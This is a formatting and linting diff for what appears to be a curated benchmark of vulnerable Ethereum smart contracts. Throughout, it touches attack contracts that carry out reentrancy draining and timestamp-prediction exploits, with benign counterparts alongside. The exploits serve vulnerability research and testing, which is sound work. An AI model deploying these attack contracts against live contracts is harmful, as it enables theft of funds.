MY_BANK(_victimAddress); } - function attack(uint amount) public { - require(amount >= 1 ether, "Must attempt and attack with at least 1 ether"); + function attack(uint256 amount) public { + require( + amount >= 1 ether, + "Must attempt and attack with at least 1 ether" + ); my_bank.Collect(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - my_bank.Put.value(msg.value)(0); + my_bank.Put.value(msg.value)(0); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(my_bank).balance >= 1 ether) { + if (address(my_bank).balance >= 1 ether) { my_bank.Collect(1 ether); } } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/etherstore_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/etherstore_attack.sol index 6ef91cf..af32d27 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/etherstore_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/etherstore_attack.sol @@ -1,30 +1,30 @@ - pragma solidity ^0.4.10; import "../dataset/reentrancy/etherstore.sol"; - -contract MaliciousContract{ +contract MaliciousContract { EtherStore etherstore; - - constructor(address _victimAddress) public{ - etherstore= EtherStore (_victimAddress); + constructor(address _victimAddress) public { + etherstore = EtherStore(_victimAddress); } - function attack(uint amount) public { - require(amount >= 1 ether, "Must attempt and attack with at least 1 ether"); + function attack(uint256 amount) public { + require( + amount >= 1 ether, + "Must attempt and attack with at least 1 ether" + ); etherstore.withdrawFunds(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - etherstore.depositFunds.value(msg.value)(); + etherstore.depositFunds.value(msg.value)(); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(etherstore).balance >= 1 ether) { + if (address(etherstore).balance >= 1 ether) { etherstore.withdrawFunds(1 ether); } } diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/modifier_reentrancy_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/modifier_reentrancy_attack.sol index d047931..6354bb5 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/modifier_reentrancy_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/modifier_reentrancy_attack.sol @@ -2,18 +2,17 @@ pragma solidity ^0.4.10; import "../dataset/reentrancy/modifier_reentrancy.sol"; -contract MaliciousContract{ +contract MaliciousContract { ModifierEntrancy modifierentrancy; bool public hasBeenCalled; - - constructor(address _victimAddress) public{ - modifierentrancy= ModifierEntrancy (_victimAddress); + constructor(address _victimAddress) public { + modifierentrancy = ModifierEntrancy(_victimAddress); } - function initiateAttack() public { - // the attack consist on making the contract give as much ether as possible - //by pretending the contract has 0 balance and faking the modifier supportsToken + function initiateAttack() public { + // the attack consist on making the contract give as much ether as possible + //by pretending the contract has 0 balance and faking the modifier supportsToken modifierentrancy.airDrop(); } @@ -26,10 +25,8 @@ contract MaliciousContract{ return (keccak256(abi.encodePacked("Nu Token"))); } - // Helper function to check the token balance - function getTokenBalance() public view returns (uint) { + function getTokenBalance() public view returns (uint256) { return modifierentrancy.tokenBalance(address(this)); } - } diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/modifier_reentrancy_benign.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/modifier_reentrancy_benign.sol index 0857cd5..271a487 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/modifier_reentrancy_benign.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/modifier_reentrancy_benign.sol @@ -9,11 +9,11 @@ contract BankBenign { modifierEntrancyInstance = ModifierEntrancy(_victimAddress); } - function supportsToken() external pure returns(bytes32){ - return(keccak256(abi.encodePacked("Nu Token"))); + function supportsToken() external pure returns (bytes32) { + return (keccak256(abi.encodePacked("Nu Token"))); } function airDrop() public { modifierEntrancyInstance.airDrop(); } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/reentrance_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/reentrance_attack.sol index 4208f42..a4585ee 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/reentrance_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/reentrance_attack.sol @@ -2,28 +2,29 @@ pragma solidity ^0.4.18; import "../dataset/reentrancy/reentrance.sol"; - -contract MaliciousContract{ +contract MaliciousContract { Reentrance reentrance; - - constructor(address _victimAddress) public{ - reentrance= Reentrance (_victimAddress); + constructor(address _victimAddress) public { + reentrance = Reentrance(_victimAddress); } - function attack(uint amount) public { - require(amount >= 1 ether, "Must attempt and attack with at least 1 ether"); + function attack(uint256 amount) public { + require( + amount >= 1 ether, + "Must attempt and attack with at least 1 ether" + ); reentrance.withdraw(amount); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1 ether, "Must add at least 1 ether"); - reentrance.donate.value(msg.value)(address(this)); + reentrance.donate.value(msg.value)(address(this)); } - function() payable public { + function() public payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(reentrance).balance >= 1 ether) { + if (address(reentrance).balance >= 1 ether) { reentrance.withdraw(1 ether); } } diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/reentrancy_bonus_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/reentrancy_bonus_attack.sol index c7a9599..58c5b9c 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/reentrancy_bonus_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/reentrancy_bonus_attack.sol @@ -1,27 +1,22 @@ pragma solidity ^0.4.24; - import "../dataset/reentrancy/reentrancy_bonus.sol"; -contract MaliciousContract{ +contract MaliciousContract { Reentrancy_bonus reentrancy_bonus; - - constructor(address _victimAddress) public{ - reentrancy_bonus= Reentrancy_bonus (_victimAddress); + constructor(address _victimAddress) public { + reentrancy_bonus = Reentrancy_bonus(_victimAddress); } - function attack() external payable { + function attack() external payable { reentrancy_bonus.getFirstWithdrawalBonus(address(this)); } - - - function() external payable { + function() external payable { // Re-enter the vulnerable function if there's still balance to collect - if ( address(reentrancy_bonus).balance >= 100) { + if (address(reentrancy_bonus).balance >= 100) { reentrancy_bonus.getFirstWithdrawalBonus(address(this)); - } } } diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/reentrancy_dao_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/reentrancy_dao_attack.sol index 4418330..a94fd27 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/reentrancy_dao_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/reentrancy_dao_attack.sol @@ -1,32 +1,27 @@ - - - pragma solidity ^0.4.19; import "../dataset/reentrancy/reentrancy_dao.sol"; -contract MaliciousContract{ +contract MaliciousContract { ReentrancyDAO reentrancyDAO; - - constructor(address _victimAddress) public{ - reentrancyDAO= ReentrancyDAO (_victimAddress); + constructor(address _victimAddress) public { + reentrancyDAO = ReentrancyDAO(_victimAddress); } - function attack() public { + function attack() public { reentrancyDAO.withdrawAll(); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1); - reentrancyDAO.deposit.value(msg.value)(); + reentrancyDAO.deposit.value(msg.value)(); } - function() external payable{ + function() external payable { // Re-enter the vulnerable function if there's still balance to collect if (address(reentrancyDAO).balance > 0) { reentrancyDAO.withdrawAll(); } - } } diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/reentrancy_simple_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/reentrancy_simple_attack.sol index 92158c6..858c10b 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/reentrancy_simple_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/reentrancy_simple_attack.sol @@ -2,29 +2,26 @@ pragma solidity ^0.4.15; import "../dataset/reentrancy/reentrancy_simple.sol"; - -contract MaliciousContract{ +contract MaliciousContract { Reentrance reentrance; - - constructor(address _victimAddress) public{ - reentrance= Reentrance (_victimAddress); + constructor(address _victimAddress) public { + reentrance = Reentrance(_victimAddress); } - function attack() public { + function attack() public { reentrance.withdrawBalance(); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1); - reentrance.addToBalance.value(msg.value)(); + reentrance.addToBalance.value(msg.value)(); } - function() external payable{ + function() external payable { // Re-enter the vulnerable function if there's still balance to collect if (address(reentrance).balance > 0) { reentrance.withdrawBalance(); } - } } diff --git a/smartbugs-curated/0.4.x/contracts/reentrancy/simple_dao_attack.sol b/smartbugs-curated/0.4.x/contracts/reentrancy/simple_dao_attack.sol index c8684b0..361cd71 100644 --- a/smartbugs-curated/0.4.x/contracts/reentrancy/simple_dao_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/reentrancy/simple_dao_attack.sol @@ -2,8 +2,6 @@ pragma solidity ^0.4.2; import "../dataset/reentrancy/simple_dao.sol"; - - contract MaliciousContract { SimpleDAO public dao; address public owner; @@ -13,16 +11,16 @@ contract MaliciousContract { owner = msg.sender; } - function attack(uint attack) public payable { + function attack(uint256 attack) public payable { require(attack > 0); dao.withdraw(attack); } - function deposit() public payable{ + function deposit() public payable { require(msg.value >= 1); - dao.donate.value(msg.value)(this); + dao.donate.value(msg.value)(this); } - function () public payable { + function() public payable { if (address(dao).balance >= msg.value) { dao.withdraw(msg.value); } diff --git a/smartbugs-curated/0.4.x/contracts/time_manipulation/ether_lotto_attack.sol b/smartbugs-curated/0.4.x/contracts/time_manipulation/ether_lotto_attack.sol index 26ab7ba..2d959f0 100644 --- a/smartbugs-curated/0.4.x/contracts/time_manipulation/ether_lotto_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/time_manipulation/ether_lotto_attack.sol @@ -10,7 +10,7 @@ contract EtherLottoAttacker { } function play() payable returns (bool) { - uint random = uint(sha3(block.timestamp)) % 2; + uint256 random = uint256(sha3(block.timestamp)) % 2; if (random == 0) { target.play.value(msg.value)(); return true; @@ -20,4 +20,4 @@ contract EtherLottoAttacker { } function() payable {} -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_attack.sol b/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_attack.sol index 4437cb2..d58237d 100644 --- a/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/0x663e4229142a27f00bafb5d087e1e730648314c3_attack.sol @@ -8,8 +8,12 @@ contract PandaCaller { pandaCore = PandaCore(_pandaCore); } - function call(uint256 _matronId, uint256[2] _childGenes, uint256[2] _factors) public { - uint babyId = pandaCore.giveBirth(_matronId, _childGenes, _factors); + function call( + uint256 _matronId, + uint256[2] _childGenes, + uint256[2] _factors + ) public { + uint256 babyId = pandaCore.giveBirth(_matronId, _childGenes, _factors); } function withdraw() public { @@ -28,16 +32,19 @@ contract PandaCallerSuccess { pandaCore = PandaCore(_pandaCore); } - function call(uint256 _matronId, uint256[2] _childGenes, uint256[2] _factors) public { - uint babyId = pandaCore.giveBirth(_matronId, _childGenes, _factors); + function call( + uint256 _matronId, + uint256[2] _childGenes, + uint256[2] _factors + ) public { + uint256 babyId = pandaCore.giveBirth(_matronId, _childGenes, _factors); } function withdraw() public { pandaCore.withdrawBalance(); } - function() external payable { - } + function() external payable {} } contract GeneScience { @@ -50,103 +57,108 @@ contract GeneScience { /// @param genes1 genes of mom /// @param genes2 genes of sire /// @return the genes that are supposed to be passed down the child - function mixGenes(uint256[2] genes1, uint256[2] genes2,uint256 g1,uint256 g2, uint256 targetBlock) public returns (uint256[2]) { + function mixGenes( + uint256[2] genes1, + uint256[2] genes2, + uint256 g1, + uint256 g2, + uint256 targetBlock + ) public returns (uint256[2]) { uint256[2] memory gene; gene[0] = (genes1[0] & g1) | (genes2[0] & g2); gene[1] = (genes1[1] & g1) | (genes2[1] & g2); return gene; } - function getPureFromGene(uint256[2] gene) public view returns(uint256) { + function getPureFromGene(uint256[2] gene) public view returns (uint256) { return 1; } /// @dev get sex from genes 0: female 1: male - function getSex(uint256[2] gene) public view returns(uint256) { - return gene[0]%2; + function getSex(uint256[2] gene) public view returns (uint256) { + return gene[0] % 2; } /// @dev get wizz type from gene - function getWizzType(uint256[2] gene) public view returns(uint256) { + function getWizzType(uint256[2] gene) public view returns (uint256) { return 1; } - function clearWizzType(uint256[2] _gene) public returns(uint256[2]) { + function clearWizzType(uint256[2] _gene) public returns (uint256[2]) { return _gene; } } contract MyERC721 { - /// @notice Name and symbol of the non fungible token, as defined in ERC721. string public constant name = "NFT"; string public constant symbol = "NFT"; bytes4 constant InterfaceSignature_ERC165 = - bytes4(keccak256('supportsInterface(bytes4)')); + bytes4(keccak256("supportsInterface(bytes4)")); bytes4 constant InterfaceSignature_ERC721 = - bytes4(keccak256('name()')) ^ - bytes4(keccak256('symbol()')) ^ - bytes4(keccak256('totalSupply()')) ^ - bytes4(keccak256('balanceOf(address)')) ^ - bytes4(keccak256('ownerOf(uint256)')) ^ - bytes4(keccak256('approve(address,uint256)')) ^ - bytes4(keccak256('transfer(address,uint256)')) ^ - bytes4(keccak256('transferFrom(address,address,uint256)')) ^ - bytes4(keccak256('tokensOfOwner(address)')) ^ - bytes4(keccak256('tokenMetadata(uint256,string)')); + bytes4(keccak256("name()")) ^ + bytes4(keccak256("symbol()")) ^ + bytes4(keccak256("totalSupply()")) ^ + bytes4(keccak256("balanceOf(address)")) ^ + bytes4(keccak256("ownerOf(uint256)")) ^ + bytes4(keccak256("approve(address,uint256)")) ^ + bytes4(keccak256("transfer(address,uint256)")) ^ + bytes4(keccak256("transferFrom(address,address,uint256)")) ^ + bytes4(keccak256("tokensOfOwner(address)")) ^ + bytes4(keccak256("tokenMetadata(uint256,string)")); /// @notice Introspection interface as per ERC-165 (https://github.com/ethereum/EIPs/issues/165). /// Returns true for any standardized interfaces implemented by this contract. We implement /// ERC-165 (obviously!) and ERC-721. - function supportsInterface(bytes4 _interfaceID) external view returns (bool) - { + function supportsInterface( + bytes4 _interfaceID + ) external view returns (bool) { // DEBUG ONLY //require((InterfaceSignature_ERC165 == 0x01ffc9a7) && (InterfaceSignature_ERC721 == 0x9a20483d)); - return ((_interfaceID == InterfaceSignature_ERC165) || (_interfaceID == InterfaceSignature_ERC721)); + return ((_interfaceID == InterfaceSignature_ERC165) || + (_interfaceID == InterfaceSignature_ERC721)); } function() external payable { revert("I always revert!"); } - } contract MyERC721Success { - /// @notice Name and symbol of the non fungible token, as defined in ERC721. string public constant name = "NFT"; string public constant symbol = "NFT"; bytes4 constant InterfaceSignature_ERC165 = - bytes4(keccak256('supportsInterface(bytes4)')); + bytes4(keccak256("supportsInterface(bytes4)")); bytes4 constant InterfaceSignature_ERC721 = - bytes4(keccak256('name()')) ^ - bytes4(keccak256('symbol()')) ^ - bytes4(keccak256('totalSupply()')) ^ - bytes4(keccak256('balanceOf(address)')) ^ - bytes4(keccak256('ownerOf(uint256)')) ^ - bytes4(keccak256('approve(address,uint256)')) ^ - bytes4(keccak256('transfer(address,uint256)')) ^ - bytes4(keccak256('transferFrom(address,address,uint256)')) ^ - bytes4(keccak256('tokensOfOwner(address)')) ^ - bytes4(keccak256('tokenMetadata(uint256,string)')); + bytes4(keccak256("name()")) ^ + bytes4(keccak256("symbol()")) ^ + bytes4(keccak256("totalSupply()")) ^ + bytes4(keccak256("balanceOf(address)")) ^ + bytes4(keccak256("ownerOf(uint256)")) ^ + bytes4(keccak256("approve(address,uint256)")) ^ + bytes4(keccak256("transfer(address,uint256)")) ^ + bytes4(keccak256("transferFrom(address,address,uint256)")) ^ + bytes4(keccak256("tokensOfOwner(address)")) ^ + bytes4(keccak256("tokenMetadata(uint256,string)")); /// @notice Introspection interface as per ERC-165 (https://github.com/ethereum/EIPs/issues/165). /// Returns true for any standardized interfaces implemented by this contract. We implement /// ERC-165 (obviously!) and ERC-721. - function supportsInterface(bytes4 _interfaceID) external view returns (bool) - { + function supportsInterface( + bytes4 _interfaceID + ) external view returns (bool) { // DEBUG ONLY //require((InterfaceSignature_ERC165 == 0x01ffc9a7) && (InterfaceSignature_ERC721 == 0x9a20483d)); - return ((_interfaceID == InterfaceSignature_ERC165) || (_interfaceID == InterfaceSignature_ERC721)); + return ((_interfaceID == InterfaceSignature_ERC165) || + (_interfaceID == InterfaceSignature_ERC721)); } - function() external payable { - } - -} \ No newline at end of file + function() external payable {} +} diff --git a/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_attack.sol b/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_attack.sol index 9918317..ce6a776 100644 --- a/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_attack.sol +++ b/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_attack.sol @@ -3,8 +3,9 @@ pragma solidity ^0.4.9; import "../dataset/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b.sol"; contract TownCrierCaller { TownCrier public TC_CONTRACT; - bytes4 constant TC_CALLBACK_FID = bytes4(sha3("response(uint64,uint64,bytes32)")); - int requestId; + bytes4 constant TC_CALLBACK_FID = + bytes4(sha3("response(uint64,uint64,bytes32)")); + int256 requestId; bytes32 public hash; function TownCrierCaller(address _townCrier) { @@ -12,8 +13,13 @@ contract TownCrierCaller { } function request(uint8 requestType, bytes32[] requestData) public payable { - - requestId = TC_CONTRACT.request.value(msg.value)(requestType, this, TC_CALLBACK_FID, 0, requestData); + requestId = TC_CONTRACT.request.value(msg.value)( + requestType, + this, + TC_CALLBACK_FID, + 0, + requestData + ); hash = sha3(requestType, requestData); } @@ -28,5 +34,4 @@ contract TownCrierCaller { function() payable { revert(); } - -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_benign.sol b/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_benign.sol index 75a2728..035594f 100644 --- a/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_benign.sol +++ b/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b_benign.sol @@ -3,20 +3,26 @@ pragma solidity ^0.4.9; import "../dataset/unchecked_low_level_calls/0x89c1b3807d4c67df034fffb62f3509561218d30b.sol"; contract TownCrierCaller { TownCrier public TC_CONTRACT; - bytes4 constant TC_CALLBACK_FID = bytes4(sha3("response(uint64,uint64,bytes32)")); - int requestId; + bytes4 constant TC_CALLBACK_FID = + bytes4(sha3("response(uint64,uint64,bytes32)")); + int256 requestId; bytes32 public hash; event LogResponse(uint64 responseType, uint64 errors, bytes32 data); - event Received(address sender, uint value); + event Received(address sender, uint256 value); function TownCrierCaller(address _townCrier) { TC_CONTRACT = TownCrier(_townCrier); } function request(uint8 requestType, bytes32[] requestData) public payable { - - requestId = TC_CONTRACT.request.value(msg.value)(requestType, this, TC_CALLBACK_FID, 0, requestData); + requestId = TC_CONTRACT.request.value(msg.value)( + requestType, + this, + TC_CALLBACK_FID, + 0, + requestData + ); hash = sha3(requestType, requestData); } @@ -31,5 +37,4 @@ contract TownCrierCaller { function() payable { emit Received(msg.sender, msg.value); } - -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/TokenEBU.sol b/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/TokenEBU.sol index ea6370a..31fc51e 100644 --- a/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/TokenEBU.sol +++ b/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/TokenEBU.sol @@ -1,10 +1,17 @@ /** *Submitted for verification at Etherscan.io on 2018-04-08 -*/ + */ pragma solidity ^0.4.16; -interface tokenRecipient { function receiveApproval(address _from, uint256 _value, address _token, bytes _extraData) public; } +interface tokenRecipient { + function receiveApproval( + address _from, + uint256 _value, + address _token, + bytes _extraData + ) public; +} contract TokenEBU { // Public variables of the token @@ -15,8 +22,8 @@ contract TokenEBU { uint256 public totalSupply; // This creates an array with all balances - mapping (address => uint256) public balanceOf; - mapping (address => mapping (address => uint256)) public allowance; + mapping(address => uint256) public balanceOf; + mapping(address => mapping(address => uint256)) public allowance; // This generates a public event on the blockchain that will notify clients event Transfer(address indexed from, address indexed to, uint256 value); @@ -34,10 +41,10 @@ contract TokenEBU { string tokenName, string tokenSymbol ) public { - totalSupply = initialSupply * 10 ** uint256(decimals); // Update total supply with the decimal amount - balanceOf[msg.sender] = totalSupply; // Give the creator all initial tokens - name = tokenName; // Set the name for display purposes - symbol = tokenSymbol; // Set the symbol for display purposes + totalSupply = initialSupply * 10 ** uint256(decimals); // Update total supply with the decimal amount + balanceOf[msg.sender] = totalSupply; // Give the creator all initial tokens + name = tokenName; // Set the name for display purposes + symbol = tokenSymbol; // Set the symbol for display purposes } /** @@ -82,8 +89,12 @@ contract TokenEBU { * @param _to The address of the recipient * @param _value the amount to send */ - function transferFrom(address _from, address _to, uint256 _value) public returns (bool success) { - require(_value <= allowance[_from][msg.sender]); // Check allowance + function transferFrom( + address _from, + address _to, + uint256 _value + ) public returns (bool success) { + require(_value <= allowance[_from][msg.sender]); // Check allowance allowance[_from][msg.sender] -= _value; _transfer(_from, _to, _value); return true; @@ -97,8 +108,10 @@ contract TokenEBU { * @param _spender The address authorized to spend * @param _value the max amount they can spend */ - function approve(address _spender, uint256 _value) public - returns (bool success) { + function approve( + address _spender, + uint256 _value + ) public returns (bool success) { allowance[msg.sender][_spender] = _value; return true; } @@ -112,9 +125,11 @@ contract TokenEBU { * @param _value the max amount they can spend * @param _extraData some extra information to send to the approved contract */ - function approveAndCall(address _spender, uint256 _value, bytes _extraData) - public - returns (bool success) { + function approveAndCall( + address _spender, + uint256 _value, + bytes _extraData + ) public returns (bool success) { tokenRecipient spender = tokenRecipient(_spender); if (approve(_spender, _value)) { spender.receiveApproval(msg.sender, _value, this, _extraData); @@ -130,9 +145,9 @@ contract TokenEBU { * @param _value the amount of money to burn */ function burn(uint256 _value) public returns (bool success) { - require(balanceOf[msg.sender] >= _value); // Check if the sender has enough - balanceOf[msg.sender] -= _value; // Subtract from the sender - totalSupply -= _value; // Updates totalSupply + require(balanceOf[msg.sender] >= _value); // Check if the sender has enough + balanceOf[msg.sender] -= _value; // Subtract from the sender + totalSupply -= _value; // Updates totalSupply Burn(msg.sender, _value); return true; } @@ -145,13 +160,16 @@ contract TokenEBU { * @param _from the address of the sender * @param _value the amount of money to burn */ - function burnFrom(address _from, uint256 _value) public returns (bool success) { - require(balanceOf[_from] >= _value); // Check if the targeted balance is enough - require(_value <= allowance[_from][msg.sender]); // Check allowance - balanceOf[_from] -= _value; // Subtract from the targeted balance - allowance[_from][msg.sender] -= _value; // Subtract from the sender's allowance - totalSupply -= _value; // Update totalSupply + function burnFrom( + address _from, + uint256 _value + ) public returns (bool success) { + require(balanceOf[_from] >= _value); // Check if the targeted balance is enough + require(_value <= allowance[_from][msg.sender]); // Check allowance + balanceOf[_from] -= _value; // Subtract from the targeted balance + allowance[_from][msg.sender] -= _value; // Subtract from the sender's allowance + totalSupply -= _value; // Update totalSupply Burn(_from, _value); return true; } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/revert_contract.sol b/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/revert_contract.sol index 3828393..9b88bc8 100644 --- a/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/revert_contract.sol +++ b/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/revert_contract.sol @@ -1,15 +1,14 @@ pragma solidity 0.4.25; contract RevertContract { - // Fallback function that will fail on purpose function() external payable { revert("I always revert!"); } function sendEther(address _to) public payable { - (bool success, ) = _to.call.value(msg.value)(""); - require(success, "Ether transfer failed"); + (bool success, ) = _to.call.value(msg.value)(""); + require(success, "Ether transfer failed"); } function withdrawEther(address _from) public { @@ -17,4 +16,4 @@ contract RevertContract { (bool success, ) = _from.call(data); require(success, "Ether transfer failed"); } -} \ No newline at end of file +} diff --git a/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/success_contract.sol b/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/success_contract.sol index e6812db..1150e38 100644 --- a/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/success_contract.sol +++ b/smartbugs-curated/0.4.x/contracts/unchecked_low_level_calls/success_contract.sol @@ -31,6 +31,5 @@ contract SuccessContract { } // it should accept any call without reverting - function() external payable { - } -} \ No newline at end of file + function() external payable {} +} diff --git a/smartbugs-curated/0.4.x/eslint.config.mjs b/smartbugs-curated/0.4.x/eslint.config.mjs new file mode 100644 index 0000000..9c616ac --- /dev/null +++ b/smartbugs-curated/0.4.x/eslint.config.mjs @@ -0,0 +1,7 @@ +import globals from "globals"; + + +/** @type {import('eslint').Linter.Config[]} */ +export default [ + {languageOptions: { globals: globals.browser }}, +]; \ No newline at end of file diff --git a/smartbugs-curated/0.4.x/hardhat.config.js b/smartbugs-curated/0.4.x/hardhat.config.js index 59db0f9..cb20544 100644 --- a/smartbugs-curated/0.4.x/hardhat.config.js +++ b/smartbugs-curated/0.4.x/hardhat.config.js @@ -24,12 +24,12 @@ module.exports = { hardhat: { initialDate: "2018-12-31 11:59:00 PM", hardfork: "shanghai", - } + }, }, mocha: { - reporter: './scripts/CustomReporter.js', + reporter: "./scripts/CustomReporter.js", reporterOptions: { json: true, // Export test results to JSON - } + }, }, }; diff --git a/smartbugs-curated/0.4.x/package-lock.json b/smartbugs-curated/0.4.x/package-lock.json index b1a6791..cca4738 100644 --- a/smartbugs-curated/0.4.x/package-lock.json +++ b/smartbugs-curated/0.4.x/package-lock.json @@ -9,9 +9,14 @@ "version": "1.0.0", "license": "ISC", "dependencies": { - "@nomicfoundation/hardhat-toolbox": "^5.0.0" + "@nomicfoundation/hardhat-toolbox": "^5.0.0", + "prettier": "^3.3.3", + "prettier-plugin-solidity": "^1.4.1", + "solhint": "^5.0.3" }, "devDependencies": { + "eslint": "^9.13.0", + "globals": "^15.11.0", "hardhat": "^2.22.5" } }, @@ -21,6 +26,27 @@ "integrity": "sha512-96Z2IP3mYmF1Xg2cDm8f1gWGf/HUVedQ3FMifV4kG/PQ4yEP51xDtRAEfhVNt5f/uzpNkZHwWQuUcu6D6K+Ekw==", "peer": true }, + "node_modules/@babel/code-frame": { + "version": "7.26.2", + "resolved": "https://registry.npmjs.org/@babel/code-frame/-/code-frame-7.26.2.tgz", + "integrity": "sha512-RJlIHRueQgwWitWgF8OdFYGZX328Ax5BCemNGlqHfplnRT9ESi8JkFlvaVYbS+UubVY6dpv87Fs2u5M29iNFVQ==", + "dependencies": { + "@babel/helper-validator-identifier": "^7.25.9", + "js-tokens": "^4.0.0", + "picocolors": "^1.0.0" + }, + "engines": { + "node": ">=6.9.0" + } + }, + "node_modules/@babel/helper-validator-identifier": { + "version": "7.25.9", + "resolved": "https://registry.npmjs.org/@babel/helper-validator-identifier/-/helper-validator-identifier-7.25.9.tgz", + "integrity": "sha512-Ed61U6XJc3CVRfkERJWDz4dJwKe7iLmmJsbOGu9wSloNSFttHV0I8g6UAgb7qnK5ly5bGLPd4oXZlxCdANBOWQ==", + "engines": { + "node": ">=6.9.0" + } + }, "node_modules/@cspotcode/source-map-support": { "version": "0.8.1", "resolved": "https://registry.npmjs.org/@cspotcode/source-map-support/-/source-map-support-0.8.1.tgz", @@ -33,6 +59,189 @@ "node": ">=12" } }, + "node_modules/@eslint-community/eslint-utils": { + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/@eslint-community/eslint-utils/-/eslint-utils-4.4.1.tgz", + "integrity": "sha512-s3O3waFUrMV8P/XaF/+ZTp1X9XBZW1a4B97ZnjQF2KYWaFD2A8KyFBsrsfSjEmjn3RGWAIuvlneuZm3CUK3jbA==", + "dev": true, + "dependencies": { + "eslint-visitor-keys": "^3.4.3" + }, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + }, + "peerDependencies": { + "eslint": "^6.0.0 || ^7.0.0 || >=8.0.0" + } + }, + "node_modules/@eslint-community/eslint-utils/node_modules/eslint-visitor-keys": { + "version": "3.4.3", + "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.3.tgz", + "integrity": "sha512-wpc+LXeiyiisxPlEkUzU6svyS1frIO3Mgxj1fdy7Pm8Ygzguax2N3Fa/D/ag1WqbOprdI+uY6wMUl8/a2G+iag==", + "dev": true, + "engines": { + "node": "^12.22.0 || ^14.17.0 || >=16.0.0" + }, + "funding": { + "url": "https://opencollective.com/eslint" + } + }, + "node_modules/@eslint-community/regexpp": { + "version": "4.12.1", + "resolved": "https://registry.npmjs.org/@eslint-community/regexpp/-/regexpp-4.12.1.tgz", + "integrity": "sha512-CCZCDJuduB9OUkFkY2IgppNZMi2lBQgD2qzwXkEia16cge2pijY/aXi96CJMquDMn3nJdlPV1A5KrJEXwfLNzQ==", + "dev": true, + "engines": { + "node": "^12.0.0 || ^14.0.0 || >=16.0.0" + } + }, + "node_modules/@eslint/config-array": { + "version": "0.18.0", + "resolved": "https://registry.npmjs.org/@eslint/config-array/-/config-array-0.18.0.tgz", + "integrity": 